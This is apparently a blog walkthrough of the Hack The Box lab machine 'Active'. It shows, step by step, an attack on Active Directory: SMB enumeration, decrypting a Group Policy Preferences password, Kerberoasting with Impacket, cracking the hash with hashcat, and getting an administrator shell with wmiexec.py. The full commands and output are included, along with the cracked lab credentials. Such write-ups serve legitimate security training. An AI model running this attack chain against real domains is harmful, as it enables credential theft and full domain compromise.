Pages

Search

HTB Active

$ sudo nmap -A -T4 -p- 10.10.10.100

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:23 CEST
Nmap scan report for 10.10.10.100
Host is up (0.059s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-08-26 09:25:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49179/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/26%OT=53%CT=1%CU=31377%PV=Y%DS=2%DC=T%G=Y%TM=5F462B4
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M5
OS:4DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-08-26T09:26:31
|_  start_date: 2020-08-26T09:20:56

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   58.89 ms 10.10.14.1
2   58.93 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 301.32 seconds

Let’s enumerate SMB resources using SMBMap.

$ smbmap -H 10.10.10.100

[+] IP: 10.10.10.100:445	Name: active.htb                                        
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

$ smbclient //10.10.10.100/Replication

Enter WORKGROUP\ruben's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

smb: > dir

smb: \> dir
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  active.htb                          D        0  Sat Jul 21 12:37:44 2018

		10459647 blocks of size 4096. 4925568 blocks available

This share seems to be a copy of the SYSVOL’s.

According to the information found in:

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences

Attack Methods for Gaining Domain Admin Rights in Active Directory

We need to find a file as groups.xml, scheduledtasks.xml and Services.xml where are stored credentials of the system.

Let’s download all the content to our machine to analyze it.

smb: > RECURSE ON
smb: > PROMPT OFF
smb: > mget *

getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0,7 KiloBytes/sec) (average 0,4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (5,7 KiloBytes/sec) (average 2,3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2,7 KiloBytes/sec) (average 2,4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (15,3 KiloBytes/sec) (average 4,9 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0,1 KiloBytes/sec) (average 4,1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (20,4 KiloBytes/sec) (average 6,4 KiloBytes/sec)

In those folders, we can find a file called: Grups.xml
(/home/ruben/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups)

$ cat Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

This file contains a cpassword and a username.

userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

In order to decrypt a GPP (Group Policy Preference) Password, we can use the tool gpp-decrypt.

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

So, the password is GPPstillStandingStrong2k18

$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb -H 10.10.10.100

[+] IP: 10.10.10.100:445	Name: active.htb                                        
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY

$ smbclient //10.10.10.100/NETLOGON -U SVC_TGS

Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 18 20:48:57 2018
  ..                                  D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4925534 blocks available
smb: \> exit

$ smbclient //10.10.10.100/SYSVOL -U SVC_TGS

Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 18 20:48:57 2018
  ..                                  D        0  Wed Jul 18 20:48:57 2018
  active.htb                         Dr        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4925534 blocks available
smb: \> 

$ smbclient //10.10.10.100/Users -U SVC_TGS

Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

		10459647 blocks of size 4096. 4925534 blocks available

smb: \SVC_TGS\Desktop> get user.txt

getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>

$ cat user.txt

86d6XXXXXXXXXXXXXXXXXXXXXXXXXXXX

As can be found in this site, GetADUsers.py

will gather data about the domain’s users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes.

$ .local/bin/GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100

/home/ruben/.local/lib/python2.7/site-packages/cryptography/__init__.py:39: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
  CryptographyDeprecationWarning,
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 21:06:40.351723  2018-07-30 19:17:40.656520 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 20:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 22:14:38.402764  2018-07-21 16:01:30.320277

As it is also described by this site,

Each Active Directory domain has an associated KRBTGT account that is used to encrypt and sign all Kerberos tickets for the domain.

In the following sites can be found more information about Attacking Kerberos:

Detecting Kerberoasting Activity
How To Attack Kerberos 101
Kerberos (II): How to attack Kerberos?
Kerberoasting your way in

Kerberoasting

This box is vulnerable to Kerberoasting.

Kerberoasting it is an attack methodology to extract service account credentials from AD.

Kerberoasting attack involves requesting a Service Ticket from the Kerberos Ticket Granting Server (TGS).
As this ticket is encrypted with the Windows NTLM password hash of the user account targeted, the password can be cracked once obtained.

GetUserSPNs.py will find and fetch Service Principal Names that are associated with normal user accounts.

https://www.secureauth.com/labs/open-source-tools/impacket

$ .local/bin/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs

/home/ruben/.local/lib/python2.7/site-packages/cryptography/__init__.py:39: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
  CryptographyDeprecationWarning,
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2018-07-30 19:17:40.656520             
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$f0bede1371c1e44a0837630832ef3fb4$8200d31fad7c4163c2e80f92bf0625d098df203f06dd31b40493758d176921b85cb326204b478f9309bdffb4054cfe7d97f69f77931b4394e1fea532556a5423009d856b0bacd1dcc1e2f21747943bebe86879881738953b405f982410e8b9fd0a95a298483a5e4ff0cb0b615a68b1194e004ba62d0a54eca9cc0accc2a414da8036bd82e6206409a215144fce07c3d6f3a5ccee6253ea2ba2090208883e852861b5d623a163ed116f4ef234686aacbf0cfb3e905a56fe8d33de56b7ec09dadb4eff38b07ac2ba8e67f2c89aaf12e1b27087aa69b94ef759aa2106b18c5828b0998e48693721689acd8d7c68806328c16b601c063b3411b52b78e1843be0319a639a1f28047668cc9edea00d1394b6aa0fd879113d175f197d21329e6642e10f2fbb8f93013b95e22c6f0183136fda6ccd67dafe70ddbb7df9e91ca88da47972339e154f155216f5bbab7af4a2e899bb7f53a1bfe85786565a03be5326755345dd24dd5eee3212151dbd942fffe405b78ffed760020eb059c01da4cb55724ada7fccb77c68d325c585c04ae75e227bc99b41fa2ce46d7e7718823f20fcfa4f47a25404e700ff0934f1787da858e25fcf0784f5a2f88f825c9c5373e2919575f134cd440d7e050ad21d993a3429147cb563d9485eba16e1f1ed7c607bf28e95aa0e1188cc5ae90a46f466f16d69c6327543deddf72e135168c34be9c924d3b300b872a50e7cfb0a5395b96ef7b3427d85e5ed0e18d5f0bb4cdfd13be870a3c43ab4e2c9416a87dad69fd5fb9031a023580ac968c2d6da1d2abb138e7ab081eeb07f15662962d145fefe5af26c2087645983692600b5d2c37bc40f397feca16052e2ea983a87c6885eafdd6f7aecbd401c26d2102b1816f484cf3f7534cbeb3f299bdbfaf7028fe266e2888b9412c469f183417795bd80b132ac8dc2f00a235bfcb2c63d71465ed4b2c6093252fab035dc0cf30f08242c5b6900d8d48f03e4b1bdbe6ff4a45335463a1da7f7a80c805d51a89a40771b2a0e1932e69655bf4ef34fb81e3cc11f1c53973b2882140dd7fec034b4a261948f77c9d9e28b619bdcb3cfb0640e1a745f227bd7de7416a3f690d03b3037d6f78257520bf9b89ccba8d2f6c32f847092ca6ca94df3e6ad582bdb87dcd1ee1317c1838d86e52b90b8039d7e109405f4ba97581f4165b9c958222b06c2facaca8da67f23ecf3cf0b83ba3b466ad3efebd5b14cf20bf89f0ee7f67d780a55442c42c4cfba1a24

To crack the password we will use hashcat.
In order to use it we need to use the has mode from the origin hash.
In our case, Kerberos 5 TGS-REP etype 23 (13100)

A list of Hash mode values can be found here

$ sudo hashcat -m 13100 active.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4377/4441 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 99 MB


Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...7eeded
Time.Started.....: Wed Sep  2 12:45:06 2020 (14 secs)
Time.Estimated...: Wed Sep  2 12:45:30 2020 (10 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   579.4 kH/s (9.26ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 8249344/14344385 (57.51%)
Rejected.........: 0/8249344 (0.00%)
Restore.Point....: 8249344/14344385 (57.51%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ethan33101 -> estampillas

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$2659ce53d80906a8f105f9a4bf677695$3c137f1f423e6f60aa100a2baba7287073e41fe8d97d8eee0dc889ca8b156e169b7b56993e0f8363aab45a9f41bb9c4db80e44c088596dbcb2513ab053a19e89d971e9fe5149cb8e11ea5fbd09c9026482f5973e428cdd4873463eb4a1564540115d4836d845a47c2554f9ab29420798d7a5906abfd13fb138e0015db5a82f13b4174ff70c4c9101b197a31b9a29ae2c0744aba54c86ae0de5910a9c439dc73ab6b94ae035f7e2bfaba5df271de7c13c84ec553e0853c7a984e849c3dfe182140cd6e0c4a658f1bc67de90faaf082a0ccb36c1c4f813b79b836c0a2ae9f03d5d895917f720014cf48da492976e94ef2dcc7ebeb298f9b839eb5c3b4ffbf4a70f32e5f26925cddb9154235ddbc7f49a46e5e4a300dd08603c47c8b5b96da1a2e15fca9cff7bbf0aaa7d739f464297952613e2aa7b89172743a4e037c75e0c5d952953325c4f15963c90f24f99ef5adc4413d2b8db0f2df4f7056e6c8b2a4f8b7563f24d161757682a4e55a7c66387ca2a8b92c6c4820dbb8e41609b09fc3dc71c3ac57ae0d62dc4385fa1b70dd417d568f30f7f4952be077b0038eab5b001a63dc349d2e2702e71b5e056b551360cc5d918a076b6d915d658629e7a8dd67d548dfb3a69208cd90d06c346b0176339070d85faf1d7b099edccda408b013696a00f2e2ec12db5361d572c93a5cf5ee8a4609624794b4441f69825ab7803ad71ccb9db0ca30d2c3c0962aec484c35731465c5d66bed9ad451cc0691fb56b7a782811fc6d522763173b240a30e19ae7fcd9041d162cc46003caa2c66ed5b8c0aa7cc7f5a628e91f41c1fb285fb51bc004a4ae64abd6f7b8e18d67e405d3bcc6d53d3340052e4ffcda72ab0bd9def23a46b105a9407f6b853c19db0c20247f808ff556ea08cee32a2e228627f5c7c7ed4b337f8b6ee4d0e9d77882b12c942f61103d943ce380fa5ff362db49a435f086c7a801085d5e1cb0ba9ba4f9f197d7a12c7196549b7606dc70a71c05f1a91672399c74b2aac0bedb88a87503a00d11b33e735a34d69cff0eab4bbb52b7fd7476df1a350e29569c5d544101f2ab0340ab8c2a261cdbe3661debec9f97e6ed0efddc2a8bb8cd088acca7bea5a02ae61c215a4c6a14fc315b0cb0c0ef5f82b3485ab2e5bffacde62f69739fa4a0cb547f7c92d0ed8903a576bd2e0c94185993937e8dbe931d954bb5b125463718457439855a177496ce646cd495b8a66351aff4407a101fcdda88fdbc5be77eeded:Ticketmaster1968
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...7eeded
Time.Started.....: Wed Sep  2 12:45:06 2020 (18 secs)
Time.Estimated...: Wed Sep  2 12:45:24 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   578.0 kH/s (9.50ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Teague51

Started: Wed Sep  2 12:44:22 2020
Stopped: Wed Sep  2 12:45:26 2020

Password = Ticketmaster1968

Wmiexec.py can be used to get a shell as active\administrator to obtain our root’s flag.

Wmiexec.py is a semi-interactive shell, used through Windows Management Instrumentation

https://www.secureauth.com/labs/open-source-tools/impacket

$ wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

C:>whoami

active\administrator

C:>dir

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
 Volume in drive C has no label.
 Volume Serial Number is 2AF3-72E4

 Directory of C:\

14/07/2009  06:20 ��    <DIR>          PerfLogs
18/07/2018  09:44 ��    <DIR>          Program Files
18/07/2018  09:44 ��    <DIR>          Program Files (x86)
21/07/2018  05:39 ��    <DIR>          Users
02/09/2020  01:53 ��    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  20.175.851.520 bytes free

C:\Users\Administrator\Desktop>type root.txt

b5fcXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *